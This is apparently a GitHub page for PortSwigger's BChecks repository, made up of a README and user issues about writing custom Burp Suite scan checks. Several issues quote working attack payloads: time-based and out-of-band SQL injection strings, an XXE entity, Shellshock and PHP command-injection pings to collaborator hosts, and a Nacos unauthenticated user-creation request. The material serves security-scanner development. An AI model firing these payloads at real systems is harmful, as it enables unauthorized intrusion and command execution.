
bchecks's Introduction

BChecks

BChecks for Burp Suite Professional and Burp Suite Enterprise Edition, developed by PortSwigger and the community with 🧡

Documentation

Burp Suite Professional: To view the documentation, go to Extensions > BChecks and click the ? icon in the top-right corner of the window.

Burp Suite Enterprise Edition: To learn more about BChecks, see Adding BChecks to Burp Suite Enterprise Edition.

To see all of our documentation on BChecks for both Burp Suite Professional and Burp Suite Enterprise Edition, see BCheck definitions.

Blogs

Burp Suite Shorts | BCheck v2-beta language

What's new with BChecks?

Introducing custom scan checks to Burp Suite Enterprise Edition

Supporting Sprocket Security's offensive security testing with BChecks

The top 10 community-created BChecks, so far...

BChecks: Houston, we have a solution!

Burp Suite Shorts | BChecks

Community submissions

To learn about the process for submitting your own BChecks, see Contributing.

BChecks

Examples

We've put together some example BChecks, to help you get started:

  • Blind SSRF via out-of-band detection
  • Exposed git directory
  • Leaked AWS Tokens
  • Log4Shell via out-of-band detection
  • Server Side Prototype Pollution
  • Suspicious Input Transformation

/examples

Vulnerabilities CVEd

The following BChecks look for specific vulnerabilities which have a CVE:

/vulnerabilities-CVEd

Vulnerability classes

These BChecks look for specific vulnerability classes as opposed to discrete vulnerabilities:

/vulnerability-classes

Other

You can see other BChecks that have been created by the community, doing wonderful things that we didn't imagine:

/other

Archive

You can see archived BChecks that have been preserved for users with older versions of Burp Suite:

/archived

Disclaimer

BChecks are written and maintained by third-party users of Burp. We review the pull requests for new community-created scripts before they are added to this repository. However, PortSwigger Web Security makes no warranty about their quality or usefulness for any particular purpose.


bchecks's Issues

Single Click installation

Can we consider this repository as a centralised repository for all the bcheck templates? It would help if we could have an option to one-click install and update all the templates within the Burp Suite application.

Similar to the BApp store, where we can install/update all extensions with one click.

It would be nice to have a similar option for bchecks as well, if we can consider this repository as the main source of all the templates.

Given "directory" feature request

Hi all, as a continuation of the discussion here (Issuing requests to each directory in a URL) #6, I'd love to know if there could be a way to run bchecks on all folders, for all hosts. Right now, as far as I know, we can trigger a bcheck on every host and every query.

The use case that I am interested in is Tomcat path normalization. The current way that I see bchecks being leveraged for finding files in a folder is to do a "given request" and do a regex replace to hit the directories under that path. However, this will trigger for every single request in specific directories, thus triggering continuously. For example, this bcheck here looks for potential php files at the root of the directory. If we manually request "/foo/bar" on a server, the bcheck will check for "/foo//php.php", "/foo//phpinfo.php", "/foo//php.php", "/foo//info.php", etc. as expected. However, if we manually request "/foo/baz", the bcheck will once again check for "/foo//php.php", "/foo//phpinfo.php", "/foo//php.php", "/foo//info.php", etc., duplicating requests uselessly.

We can "minimize" this by checking the "ignore duplicate items based on URL and parameter names" setting in the scanner task, so it doesn't keep triggering over and over for the same initial request, but it'll still trigger for all other endpoints under that particular folder.

To illustrate the issue, let's take a simple web application loading a javascript file, a css file, and an image (4 requests). If all of these are in the same directory path, it would be nice if the bcheck had a way to check for those potential paths only once per directory. Right now, the bcheck would trigger 4 times (once for the initial request plus 3 for each asset), thus generating 105 requests total, when only 21 were necessary. This quickly gets out of hand on modern apps with hundreds of assets, generating thousands of unnecessary requests for repeat checks.

I think a solution would be to be able to have an event handler that would trigger on each directory per host. If we could do something like this, for example:

run for each:
    potential_path =
        "/foo"
        "/bar"
        "/baz"

given directory then
    send request:
        path: ${base.request.directory}${potential_path}

[...]

This would allow us so much more flexibility to run checks for directory-related issues (leftover debug files, path normalization, etc). Obviously this would need to be tracked the same way requests are tracked currently with the "ignore duplicate items based on URL and parameter names" setting.

Thank you for considering this!

Issuing requests to each directory in a URL

Is there a way to issue requests for each directory in a path? For example, let's say we want to look for /.git/config in each directory for the URL http://foo.com/dir1/dir2/test.html. That would result in three requests:

GET http://foo.com/dir1/dir2/.git/config
GET http://foo.com/dir1/.git/config
GET http://foo.com/.git/config
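The per-directory probe deduplication that the two requests above describe, as an added example that is not part of the repository or of either issue author's post: it is written in Python because the BCheck language has no "given directory" trigger, and the app.test hostnames and candidate filenames used in the second scenario are constructed.

```python
"""Per-directory probe deduplication (constructed example).

The scanner observes several URLs, derives every parent directory of each
one, and issues each candidate probe once per (scheme, host, directory)
instead of once per observed request.
"""
from typing import Iterable, List
from urllib.parse import urlsplit, urlunsplit


def directory_prefixes(url: str) -> List[str]:
    """Return every directory prefix of the URL's path, deepest first.

    'http://foo.com/dir1/dir2/test.html' -> ['/dir1/dir2/', '/dir1/', '/']
    A trailing slash means the final segment is itself a directory.
    """
    path = urlsplit(url).path or "/"
    segments = [s for s in path.split("/") if s]  # also collapses '//'
    if not path.endswith("/") and segments:
        segments = segments[:-1]  # last segment names a file, not a directory
    return ["/" + "/".join(segments[:depth]) + ("/" if depth else "")
            for depth in range(len(segments), -1, -1)]


def probe_urls(observed: Iterable[str], candidates: Iterable[str]) -> List[str]:
    """Build the probe list once per (scheme, host, directory).

    Directories already covered by an earlier observed URL are skipped, which
    is the behaviour the 'given directory' request asks for.
    """
    names = [c.lstrip("/") for c in candidates]
    covered = set()
    probes: List[str] = []
    for url in observed:
        parts = urlsplit(url)
        for prefix in directory_prefixes(url):
            key = (parts.scheme, parts.netloc, prefix)
            if key in covered:
                continue
            covered.add(key)
            probes.extend(
                urlunsplit((parts.scheme, parts.netloc, prefix + name, "", ""))
                for name in names
            )
    return probes


def naive_probe_count(observed: Iterable[str], candidates: Iterable[str]) -> int:
    """Requests a per-request BCheck issues: every directory of every URL, again."""
    n = len(list(candidates))
    return sum(len(directory_prefixes(url)) * n for url in observed)


if __name__ == "__main__":
    # URL and candidate taken from the issue text above.
    for probe in probe_urls(["http://foo.com/dir1/dir2/test.html"], [".git/config"]):
        print("GET", probe)
```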

add

add this
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)

given query or body insertion point not working for body parameters

I have created bchecks for detecting SQL injection, but it seems to be appending the payload only on the GET parameters.

metadata:
    language: v1-beta
    name: "SQL Inj POST"
    description: "Tests for sqli"
    author: "Muthu"

run for each:
    inj = "'","'+OR+1=1--"

given query or body insertion point then
    send payload called check:
        appending: {inj}

    if {check.response.body} matches "(SQL|Postgresql|Microsoft Sql|sql|postgresql|microsoft sql)" then
        report issue:
            severity: info
            confidence: certain
            detail: `There is a change in response when {inj} is injected.`
            remediation: "Ensure your git directories are not exposed."
    end if

Enhancement: Support "send request" on "given response"

It would really be helpful if we could send a request based on a response condition.

Consider this scenario:

  1. I want to detect whenever a response has a Content-Type of application/json
  2. When detected, I then wish to send a request to fetch a relative URL to that response (i.e.: GET {latest.response.url.path}/../swagger/swagger.json)

This would allow the detection of potential API docs relative to a possible API endpoint.

The point is we cannot send a request based on the "given response" action. Could that be considered in the future?

Ability to filter bchecks in the dashboard

Is there a way to filter on bchecks in the issues section of the Dashboard (e.g. tags) without adding something custom to the name (e.g. "name: cve-xx-xxxx (bcheck)")? It would be nice to quickly filter on bcheck issues from other issues or having tags usable in the dashboard.

Working with multiple parameters

Can we work with all the given request parameters including query and body parameters and JSON?

Assuming the request has 2 queries and 2 body parameters. Is it possible to add the payload to each parameter one by one and send 4 different requests?

Check in request or response

We have created a simple BCheck to flag response with Content-Type: text/event-stream:

metadata:
    language: v1-beta
    name: "Event-stream detection"
    description: "Checks for event-stream (passive)"
    tags: "passive"

given response then
    if "text/event-stream" in {latest.response.headers} then
        report issue:
            severity: info
            confidence: certain
            detail: "The Content-Type: Event-stream is set in the response."
    end if

We would like to also check the request for Accept: text/event-stream in the same BCheck but that does not appear to be possible.

Basically what we would like is given request or response contains text/event-stream then report issue.

Regex match retrieval

Hi,

I was wondering if there is a way when a match is being done using regex to retrieve that value.

Thank you

Access insertion point values

It would be nice to have an ability to get the current insertion point value within the given insertion point then block. Some vulnerabilities may depend on the current values of the parameters -- integers, strings or booleans.

Suggestion (Comparison Operators)

Hello there guys!

I was creating some Bchecks yesterday and I missed some comparison operators.

I noticed this case while creating GraphQL Alias/Array-based Queries Bchecks, where I tried to report an issue just if the result contained more than X occurrences of a string.

Tried using RegEx but it's not working properly.

Am I missing something? If not, it would be a very nice feature :)

Thought about something like:

metadata:
  language: v1-beta
  name: "Some name"
  description: "Some description."
  tags: "tags"
  author: "someone"

given response then
  if ("string" matches > 5 times in {latest.response.body}) then
    report issue:
      severity: low
      confidence: tentative
      detail: "Some detail."
      remediation: "Some remediation."
  end if

Enhance: Creating Multiple Issues on 'run for each'

Issue:
Currently a BCheck will terminate after an issue was created, regardless of whether there are run for each items that were not iterated yet. This behavior is counterproductive to me. I'd like to see BChecks that can create multiple issues, depending on certain conditions.

Example:
Consider the following scenario. I've created a BCheck that checks different supported / accepted content types for an API endpoint. I've created the following BCheck to replace the header 'Accept' with a value from a list of possibly supported content types. At the end, the BCheck verifies whether the HTTP status code indicates that the content type was accepted or not. In case it was, I want to create an issue for further, manual investigation.

Now if during the run of this BCheck this condition would equal true (e.g. for application/json), Burp would no longer check if application/xml is also accepted.

metadata:
    language: v1-beta
    name: "Content Type Enumeration"
    description: "Testing for accepted content types"
    author: "anakles"

run for each:
    content_type =
        "text/plain",
        "text/json",
        "text/xml",
        "application/json",
        "application/xml",
        "application/x-www-form-urlencoded"

given request then
    send request called check:
        replacing headers: `Accept`: `{content_type}`

    if not({check.response.status_code} is "406") then
        report issue:
            severity: info
            confidence: certain
            detail: `The endpoint does also provide (or accept) data in the {content_type} format.`
            remediation: "Manual investigation is advised. Test, if this opens the way to new vulnerabilities."
    end if

Enhancement:
I would like to see the BCheck continue after creating the first issue. In the mentioned example this would mean that Burp creates an issue for both application/json and application/xml (if accepted).

Enhancement: Create a BChecks scan configuration in the built-in library

The default UI elements when building a custom scan configuration make it a bit tedious to uncheck everything except "BCheck generated issues". Why not create a new Auditing configuration just for BChecks and add it to the built-in library?

Call it "Audit checks - BCheck scripts only" or something like that.

BChecks concurrent requests?

Should requests initiated by BChecks run concurrently based on the scan's resource pool configuration? If they should, it's not what I'm observing.

Using the default resource pool with 10 concurrent requests, I can see requests appear in the Logger one by one instead of 10 at once. Additionally, it took 178 seconds (~3 minutes) to issue 188 requests, which seems a bit too long if 10 requests were issued concurrently. I would expect it to finish in under 30 seconds in that case.

Add "given hostpath then" attribute.

Add a "given hostpath then" attribute. If it only supports request and host functions, scanners like nuclei can easily achieve this and have complete PoC templates, so BCheck does not have an advantage. It should utilize the crawling advantage to scan discovered secondary and tertiary paths, instead of only being able to scan first-level vulnerability paths like nuclei.

`differs from` not strict

I have a bcheck script which has the following line:

if {base.response.body} differs from {latest.response.body} then

Supposedly, it should only report if there are changes in the response body. However, what's happening is that there's still a report if there's a change in the response headers.

Request feature - Response timeout

Hi PortSwigger team,

I propose adding a response keyword, timeout, as a boolean value, to know when the request didn't get a response from the server, for vulns like DoS.

Thank you.

appending with multiple payloads is giving an error

metadata:
    language: v1-beta
    name: "SQL Injection "
    description: "Classic SQL Injection"
    author: "Carlos Montoya"

given query insertion point then

    # only run for successful base response
    if {base.response.status_code} is "200" then
        send payload called weaponized:
            appending: "'", "))", "\", "\""

        # different status code for single quote - sus!
        if {weaponized.response.status_code} differs from {base.response.status_code} then
            send payload called benign:
                appending: "''"
            if {benign.response.status_code} is {base.response.status_code} then
                report issue:
                    severity: high
                    confidence: certain
                    detail: `When adding a single quote, the status code of the response changed from {base.response.status_code} to
                              {weaponized.response.status_code}. When two quotes were injected the status of the {base.response.status_code}
                              changed to 200. This indicates that the server is passing the user-supplied input without sanitizing.`
                    remediation: "Never pass user input directly to a database. Use a prepared statement when interacting with
                                sql databases."
            end if
        end if
    end if

Naming convention issues

The bcheck file with the author "Carlos Montoya" in the example has problems: the name does not have a clear meaning, and it is difficult to confirm the usage based on the name after importing into Burp's BChecks.

First occurrence in Regex

Hi, is there a possibility to use regex_replace() to replace the first occurrence of a single character?

I mean, can we have a count=1 like in Python:

replaced_string = re.sub(regex, replacement, source, count=1)

Add "Event Log" support or add an "Output" tab like we have in custom extensions

While debugging .bcheck scripts it would be REALLY nice if we could write to the Event Log so we can do rudimentary logging to see what the heck is going on. Right now, I am using "report issue:" to do it, which is ugly and just not appropriate.

Alternatively, some sort of output tab similar to how it's done in custom extensions would work too. We just need some way to track how things are flowing through a .bcheck.

Thanks for considering the request. Awesome addition. Just need to sand out some of these rough edges for script creation.

Add response.time property

Sometimes it's necessary to compare the times that a server spent for a response so this property will be very useful.

Flag to avoid URL encoding in GET based parameters

Hi all, while writing a "given insertion point then" BCheck, I noticed that my appended payloads would automatically get URL encoded in GET parameters. Any plans on making this optional? For example, this would make finding some SSI injections and ESI injections impossible.

i.e.:

define:
    ssi_payload="<!--#echo var=\"HTTP_USER_AGENT\" -->"

given insertion point then
    send payload:
        appending: {ssi_payload}

Expected behaviour: the vulnerable app would echo the payload and the web server would evaluate the SSI tag.
request:
GET /?param=foo<!--#echo var=\"HTTP_USER_AGENT\" -->
response:
foo<!--#echo var="HTTP_USER_AGENT" -->

Observed behaviour: the vulnerable app receives a URL-encoded payload, the server does not see the SSI tag because it is URL encoded, thus we get a false negative:
request:
GET /?param=foo%3c!--%23echo%20var%3d%22HTTP_USER_AGENT%22%20--%3e
response:
foo%3c!--%23echo%20var%3d%22HTTP_USER_AGENT%22%20--%3e

[If any interaction] Didn't create the finding in the Burp dashboard

Hi, I am creating this bcheck to detect OOB SQL Injection within the cookie insertion point. I saw the DNS call within Burp Collaborator, but the issue is not created in the Burp Suite dashboard.

metadata:
    language: v1-beta
    name: "HOSTS OOB SQL Injection"
    description: "Hosts OOB SQL Injection"
    author: "Abdilahrf"

run for each:
    payloads =
        `1 AND 1=UTL_INADDR.get_host_addr('http://{generate_collaborator_address()}')`,
        `1 AND SELECT LOAD_FILE(concat('\\\\',@@version, '.{generate_collaborator_address()}/'))`,
        `x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{generate_collaborator_address()}/"> %remote;]>'),'/l') FROM dual--`

# we will automatically insert into nested insertion points
given cookie insertion point then

    # only run for a successful base response code
    if {base.response.status_code} is "200" then
        send payload called weaponized:
            appending: {payloads}

        # If we found an error message for a specific database
        if any interactions then
            report issue:
                severity: high
                confidence: certain
                detail: `We found OOB SQL Injection {payloads}`
        end if
    end if

error installing

I have updated my Burp Pro to the latest version (v2023.6.2), and when I try to install the plugin I get this error:

java.lang.Exception: Extension class is not a recognized type
	at burp.Zbmc.Zp(Unknown Source)
	at burp.Zbmc.Zo(Unknown Source)
	at burp.Zkfl.ZZ(Unknown Source)
	at burp.Zb5f.Zv(Unknown Source)
	at burp.Zb3r.lambda$panelLoaded$0(Unknown Source)
	at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:577)
	at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:317)
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)
	at java.base/java.lang.Thread.run(Thread.java:1589)

Where is the problem here? The Java version is 19.

Enhancement: Access Contents of Specific Headers

I believe a useful feature would be to check the value of a certain header, rather than only checking if the header exists and if the usual values are in the response.

For example, being able to check what the value of the X-Powered-By header says would allow authors to provide more relevant guidance for specific tech stacks.

Another example of where this would be useful would be to move away from the current paradigm of

and "application/json" in {check.response.headers} then

where it's only checking to see if application/json is in any of the headers, not if it's in the Content-Type header.

Example of what I'd like to see:

detail: The server announces its underlying technology. {latest.response.headers.X-Powered-By}

to list all instances of the X-Powered-By header.

or

and "application/json" in {check.response.headers.Content-Type} then

Since multiple can be in the response, having a way to interact with individual ones or all at once would be useful as well.

Add new metadata property "reference:"

It would be useful to add to the language syntax an additional field to add reference links.

Example:

reference:"
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22897
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt
    - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/"

Issue with Variable Inclusion in [run for each]

Hi,
I am trying to define a value and then include it in "run for each"; the code is validated. I've encountered an issue related to variable inclusion in the loop: it does not send any request at all.
Here is my code example:

define:
    custom_collaborator = "XXXXX.oast.live"

run for each:
    payload = "shell_exec('ping -c 1 {custom_collaborator}')",`system('ping -c 1 {custom_collaborator}')`

I know I can change the collaborator setting, but I am trying to create the same scenario in scripts where I add defined variables to the "run for each" loop.

Regards

Originally posted by @ayadim in #90

Question

Is it possible to detect an HTTP response with a regex?

define variable doesn't work in backquotes

run for each doesn't work 😀

#     method: DELETE
#     path: /nacos/v1/auth/users?username=

metadata:
    language: v1-beta
    name: "Nacos Create User"
    description: "Nacos Create User"
    tags: "Unauthorized","Nacos"
    author: "JaveleyQAQ"

define:
    user = {random_str(5)}

run for each:
    nacos_detect =
        `/nacos/v1/auth/users?username={user}&password={user}`

given request then
    send request called nacos:
        method: "POST"
        path: {nacos_detect}
        headers:
            "User-Agent": "Nacos-Server"

    if {nacos.response.status_code} is "200" and
        "create user ok!" in {nacos.response.body} then
        report issue:
            severity: high
            confidence: certain
            detail: ` Nacos create user:{user}/{user}`
            remediation: "."
    end if

Error when using report issue and continue in BChecks editor

First of all, I'd like to inform you that I'm a new user of BChecks. I'm trying to create a BChecks script to check for missing security response headers for some reason.

According to the action report issue and continue in https://portswigger.net/burp/documentation/scanner/bchecks/bcheck-definition-reference#actions, another usage example is:

report issue and continue:

Currently, my Burp Pro version is 2023.10.2.4. I can use the action report issue without getting any error.
However, when I try to change the action from report issue to report issue and continue (on line 10) I get an error, as shown in the following figure.

I'm not sure what I did wrong. Please help me with a recommendation. Thanks.

Improve "run for each" variables logic

When the run for each variables are used, the requests are getting repeated even though the run for each placement may not be reached.

Consider the following situation:

You want to check for XSS vulnerabilities. You have 10 payloads in run for each. But before sending those payloads you need to make sure that the injection point reflects on the page, to decrease the amount of useless requests.

Example:


metadata:
    language: v1-beta
    name: "Test"
    description: "Tests"
    author: "sh"

run for each:
    calculation = "314116790-1", "314116788+1"

define:
    answer="314116789"

given insertion point then
    # check whether the injection point reflects on the page
    send payload: #[1]
        replacing: {answer}

    # if it reflects - send payloads
    if {answer} in {latest.response} then
        send payload:  #[2]
            replacing: {calculation}

        if {answer} in {latest.response} then
            report issue:
                severity: medium
                confidence: tentative
                detail: "v"
        end if
    end if

With this configuration, for every #[2] request the #[1] one will be sent as well (even if the first condition won't be reached at all), but the #[1] request needs to be sent only once because the response won't change.

I think it can be solved by adding another special word that will annotate the start of repeating for run for each. For example:

if {answer} in {latest.response} then
    repeat calculation:
        send payload:  #[2]
            replacing: {calculation}

NullPointerException

I get prompts when using the case template as well. My Burp Suite version is 2023.7.

Unexpected error.

So I am getting a rather unusual error while trying to test out a bcheck based on some of the templates here.

Process-monitoring the vulnerable VM, the ping command does get run correctly, but something in Burp is deeply dissatisfied with things and chucks out an error.

Using the vulnerable VM from here: https://pentesterlab.com/exercises/cve-2014-6271/attachments

Template code:

metadata:
    language: v1-beta
    name: "Request-level collaborator based Shellshock"
    description: "Shellshock in headers with out-of-band detection"
    author: "fsd"

define:
    shellshock = `() \{ :;}; /bin/bash -c 'ping -c 1 {generate_collaborator_address()}'`

given request then
    send request:
        replacing headers:
              "User-Agent": `{shellshock}`

    if dns interactions then
        report issue:
            severity: high
            confidence: firm
            detail: "shellshock in user-agent header."
            remediation: "lol, update bash."
    end if

Update: It now, for whatever reason, seems to work fine. I did nothing but try again after a while.

Mapping "report issue" values to expected IScanIssue values

I believe the BCheck documentation for "report action" severity and confidence may be incorrect. Considering what is already documented in the IScanIssue interface, I believe it should be:

SEVERITY

  • "High"
  • "Medium"
  • "Low"
  • "Information"
  • "False positive"

CONFIDENCE

  • "Certain"
  • "Firm"
  • "Tentative"

Currently, both Severity and Confidence are listed as "[info|low|medium|high]" which doesn't map to any current issue rating in Burp.

The examples don't even match what the BCheck docs show, so I think it would be good to keep all docs aligned with the underlying IScanIssue interface that ends up in the Issue Activity pane anyways.

If I am incorrect in this expectation, could you please clarify what the RIGHT values are supposed to be so we can make sure we use the right severity and confidence levels in future check scripts?

Removing headers: unclear documentation and feature not working

Hi team,

First of all, thanks for the great work on BCheck! It's an excellent feature.
I really appreciate it; that's the reason why I want to contribute by reporting some issues.

Use case: create a BCheck rule that will request admin endpoints without authentication information (headers: cookie & authorization)

I went to the documentation sub-section of send request.

send request [called request_name]:
  [..]
  removing headers:
    "name_of_header1":,
    "name_of_header2":"

So at this point, I didn't understand why I had to specify the value of the headers I want deleted. But when I validated my rule it gave me an error at the position of the character ':'.

Then, I looked at the description column in front of the row removing headers: in the table above:

Removes the specified header(s) from the request. You can list multiple header names

So, this explains why I got a validation error of the rule: compared to the documentation's example (shown above), I had to give a list of headers, not a dictionary.

  • Improve/fix the documentation with:

    send request [called request_name]:
      [..]
      removing headers:
        "name_of_header1",
        "name_of_header2"

  • Removing specific headers behavior doesn't seem to work:

Now my rule is valid, so let's move on to the implementation. Here is the minimal reproducible example (MRE):

metadata:
    language: v1-beta
    name: "Remove AuthZ headers"
    description: "Remove Cookie and Authorization headers"
    author: "someone"
    tags: "active", "unauthenticated"

run for each:
    potential_path =
        "/admin",
        "/admin-panel"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}
        removing headers:
            "Cookie",
            "Authorization"

    if {check.response.status_code} is "200" then
        report issue:
            severity: medium
            confidence: firm
            detail: "rule detail"
            remediation: "rule remediation"
    end if

While launching the scan, the requests always contain the headers that are supposed to be removed: Cookie or Authorization.
So, the rule therefore matches where it shouldn't.

Is it a known issue that removing something with a rule (headers here) does not work?

Can't dns interactions be detected at given insertion point then?

This is my code, and I know for sure that there will be a callback, but I'm getting an error reported in the event log.

This is my complete code

metadata:
    language: v1-beta
    name: "Request-level collaborator based"
    description: "Blind SSRF with out-of-band detection"
    author: "Carlos Montoya"

given insertion point then
    send payload:
        replacing: {generate_collaborator_address()}

    if dns interactions then
        report issue:
            severity: high
            confidence: firm
            detail: "This site fetches arbitrary URLs specified in the Referer header."
            remediation: "Ensure that the site does not directly request URLs from the Referer header."
    end if

sql

sql time based injection

QS

Hello, how can I replace the value of each parameter, or append a payload to each parameter?
